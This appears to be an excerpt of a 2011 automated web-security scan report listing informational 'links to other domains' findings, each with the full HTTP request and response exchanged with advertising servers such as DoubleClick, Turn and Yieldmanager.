Content-Length: 491
Date: Sun, 02 Oct 2011 23:50:08 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b94/0/0/%2a/e;234516816;0-0;0;24869226;3454-728/90;41773615/41791402/1;u=,cm-30313306848_1317599407,,soccer,ax.;~okv=;net=cm;u=,cm-30313306848_1317599407,,soccer,ax.;;sz=728x90;net=cm;env=ifr;ord1=879803;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;~aopt=2/0/ec/0;~sscs=%3fhttp://fightglobalwarming.com"><img src="http://s0.2mdn.net/viewad/2167886/728x90.GIF" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
19.9. http://ad.doubleclick.net/adj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.guardian/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/cm.guardian/;net=cm;u=,cm-30120266127_1317599407,,soccer,ax.;;sz=300x250;net=cm;env=ifr;ord1=63589;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;ord=$random$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 493
Date: Sun, 02 Oct 2011 23:51:34 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b94/0/0/%2a/u;234516818;0-0;0;24869226;4307-300/250;41773664/41791451/1;u=,cm-30120266127_1317599407,,soccer,ax.;~okv=;net=cm;u=,cm-30120266127_1317599407,,soccer,ax.;;sz=300x250;net=cm;env=ifr;ord1=63589;dcopt=ist;cmw=owl;contx=soccer;an=;dc=s;btg=;~aopt=2/0/ec/0;~sscs=%3fhttp://fightglobalwarming.com"><img src="http://s0.2mdn.net/viewad/2167886/300x250.GIF" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
19.10. http://ad.doubleclick.net/adj/gna.en/level2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gna.en/level2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/gna.en/level2;tile=2;sz=970x40;ord=981376?area=2l&team=manu&league=epl&pagetype=team&teamname=man-utd-news&ord=981376 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 245
Date: Sun, 02 Oct 2011 23:52:13 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b94/0/0/%2a/v;44306;0-0;0;42319734;28932-970/40;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
19.11. http://ad.doubleclick.net/adj/ta.ta.com.s/na.us.ma.boston  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ta.ta.com.s/na.us.ma.boston

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ta.ta.com.s/na.us.ma.boston;mcid=11893;PageType=SmartDeals;pool=T;geo=60745;u=SmartDeals%7CT;rd=com;abr=!webtv;hcm=false;hname=Boston;gname=Massachusetts;sz=728X90%2C970X66;tile=1;ord=62674771? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38538
Date: Mon, 03 Oct 2011 00:38:28 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
rtDeals%257CT%3B%7Eaopt%3D0/ff/8aed/ff%3B%7Efdr%3D245480538%3B0-0%3B0%3B28071764%3B3454-728/90%3B43869829/43887616/1%3Bu%3DSmartDeals|T%3B%7Eaopt%3D2/1/8aed/0%3B%7Esscs%3D%3fhttp://virginamerica.com/"><IMG SRC="http://s0.2mdn.net/3268620/PID_1701515__bacIMG728x90.jpg" width="728" height="90" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...
19.12. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=27255192&ahcid=2583672&bimpd=XtwKUI1Zs52EB1CP5AYjM4BAYyGskigYFME9-_flqzCjJ6blFxIWsymUjmVwAPMAQ3NqILtmftDEfX5J0Kab_PhJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14xJ8juiR_Repi1zn-UozfAeCMVGq9XR5SiywZpmSZtC4PWshpjciO-FjY1pXHc1Ey9bQzHnpjv5_yeFvQGeirggVU6HL8gTJU10INlF7Q4ifg1w1T9pHaCpAOioCT8Bk3SI1EPZPTo59m_DiO-2gLEiLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXu9QN9lquQ2IMiN24AK-JVtj4ShUqdCfZZ9an1FFgetJ6nL9CCJUK3wKLNKFDlir4DGnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnGbLgoGOmgImEokpFYr_do-jFboIKnDep8RxIrEqJex1vMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhXITkPzkVIWZMbJ-qkV8b82fkx1M292Tos0VGUTSslMWvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPijkriCu4UjPOsP76C358RxTC1cI3gHRYYzm1ggWtq2RptQx4alsb2FH5PbRi4PUQft8hIPXsjNj60ucA0jBubXLK1EaGuwAlEPUKyOoDOQbSwLEskZRHdhJ9_BCq9AZ4lzCLz8LCFx0LMQqWwBzt6oLmbzXlxFvaQjey5gjRdf9y730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0150&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVjc1ugzAQhJ%2DGG7LADtgI9eDEUKECKa2bllwQYBNQyo8IFYSnD2po7l2ttKPZ%2EWZ1ZGPDwqKwMt0oUiwJsnUEc6zlWmFJVbNtG2JobRAhGKsXbyvovp2eR0YaL6K%2ExUz9T1LKCI28u%2E9KKBgZAMbxy787NNsF4wrh6H2V6%2D5%2Eg1nFm7Miy7816oWSYJq97SOLHco9d2A8n6D%2EeTiH3BkC7n4HO72K54%2Drz%2EPNkYtzwONrOHvX8PQgn1S1HIZOQVSB7tICDH0q5ATaTjYTyNt6MdOiB125HLlz28hKKIiZyNIVaObZoqvmIvsh6dNGtHXS%2ENSZ7JNS9vIGBcVuFw%3D%3D%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rv=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15228%7C15228%7C15231%7C15248

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 04 Oct 2011 23:53:01 GMT
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:53:00 GMT
Content-Length: 8525


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
{return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n\n\n     \n        \n                \n        <a target="turn_ad_landing_page" href="http://www.smokeybear.com"><img border="0" src="http://img.turn.com/img/server/ads/ps/300x250.jpg">
...[SNIP]...
19.13. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByKY-Z.t7RCuK-KJYcI01vgaQ38Z03jR6A1yA6AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D2486156300%26r%3D0%26s%3D2126909,56138bf2-ed52-11e0-8513-0bddcfe107c2,1317599870833 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:51 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0392.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:57:51 GMT
Pragma: no-cache
Content-Length: 1850
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599870_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljMtuwjAQRb8mu8jyIw-jqAunbqoIjEob2sIGBdtpoCQGk4o0X4.VIH6go9HMuaM7F5EkJnFYSqpCpHAVTVSCCJYxwpQElQ-TJAlQSCCCFIf-OU8V4wjmLJ1OTwv2V3zCpyO5ySlbrEb1Qhm4cAACY8VlPJ0
...[SNIP]...
79.LpfN8tecLUXtxz3.-D7ddcdPcI8nLlWoLOl0j0wR932QJrGHcvKgmPtTJnVldXn2iM8gB6OBtPqnXIqChFyWm4d79qztt3Glq0yzab9abbabmpttTMcjHSOK5PMczU=,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599870_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599870_HERE" border="0" alt=""></a>
...[SNIP]...
19.14. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABop.IGXd7RCiJWsDHFLo.ek0AyhF-Ro3hPHqguAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D571789886%26r%3D0%26s%3D2126909,f60ff498-ed51-11e0-9103-78e7d1f5c918,1317599709748 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:18 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0310.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:55:18 GMT
Pragma: no-cache
Content-Length: 1834
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599709_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljN1qg0AQhZ.GO1n2x58E6cXabYKYtQ1Ig7kR3d3UYHTNxhLx6bvU4gt0GGa-M5w5iET-xQuEwKGPw1oSpCJEsAgRxFW4dWEURQTiEGEvcB9JLClDMKFxmt6P9LfYlqUL2ck29Fgs6mNDwZMB4GnDn8vpzjd
...[SNIP]...
mQC--cy5afClTM7fS-PtIX123GcXAIdfDOtgSjqaSagB5UPwGhO3usLgYMjTXtjLoY9Wgcwjzo4GDWvbpKqwIfIatFbfnaP5QZS1P1Undl.93VypSNMsoablpYxw-1yHJ2,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599709_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599709_HERE" border="0" alt=""></a>
...[SNIP]...
19.15. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4YdyBk-PRCusQbehvZKWfB0V5hgpBffPI1valAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3307954001%26r%3D0%26s%3D2126909,10c779c0-ed55-11e0-acf4-78e7d1f5075a,1317601043062 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:28 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0388.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:17:28 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601043_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9tqhDAQ.RrfJOTiFelD3FSQbtou2Ip9WdwkWxdXY6NF8eub1mV.oMMwc85w5gyDSELiqJZxEBPlnZCPwwQRLELshWEAXZgkCYbQ9yOCIHLHPJWUIZjTXSmCA.0LFrOnDdnKInrIN.YaUTAzADxt-LyNvng
...[SNIP]...
FbXlaIM4Gq20t2.8F1m2kaHEIdnNmUYDK1VAvQg-oXIHRnh.XZgKGxosyos1Fj4xDmQQcHq-7VRVoW-OiXi5PFl35UZjqaupe6O.bf3UmZY6OMsoKrFlbxA53ncmI=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601043_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601043_HERE" border="0" alt=""></a>
...[SNIP]...
19.16. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8vVip5ubRCvLXWHdGFKHcFPA2DOTiN8.x2RQRAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2724012397%26r%3D0%26s%3D2126909,0c2a1d62-ed57-11e0-b5c1-78e7d15ecef4,1317601894313 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:34 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0332.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:34 GMT
Pragma: no-cache
Content-Length: 1582
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601894_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTdFqgzAU.RrfJCQmtRHZQ2xWkDWygijti9gYZ9dqXHTU9euXzeIP9HK595zDueciHCqCA-zV9ZpSAiU8hQh7co2RD33qwjC0HCHsk1VA3CGOKsYRjNkml.6e.RcP-NuM7OSU7eOZvVMGbhwAoo24zdKXoHC
...[SNIP]...
yri0iz68HL2mQ5ZC-u24xj72DmeFvbFRhNWakJ6F51E5C6tWJZG9A31rQ1qjZqaBzMCXQ8.647da4s81foj8uTxeduUGYsTNlVui267.akTNEoo6zhqqV1.AI7WXMy,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601894_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601894_HERE" border="0" alt=""></a>
...[SNIP]...
19.17. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-Yu0ZA-bRCsQZtrSLd65ydPJL1siTfpfb3mHrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D102130875%26r%3D0%26s%3D2126909,84e2f702-ed56-11e0-bfce-ffb283748b1a,1317601667355 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:28:03 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0193.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:28:03 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601667_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9FugjAU.RreWNOWCiVkD8VOwyZsJmZGX4y0VZhAWWGR8fU2w.gDu7m595yTc09ykRd5OJf5SVEkiMCSBBHysAiwwiGhLoyiiKDZLKBhQAO3S2LJOIIJm78If83-iof8bUJ2csrWemIflIErB4Bok14n6Tu
...[SNIP]...
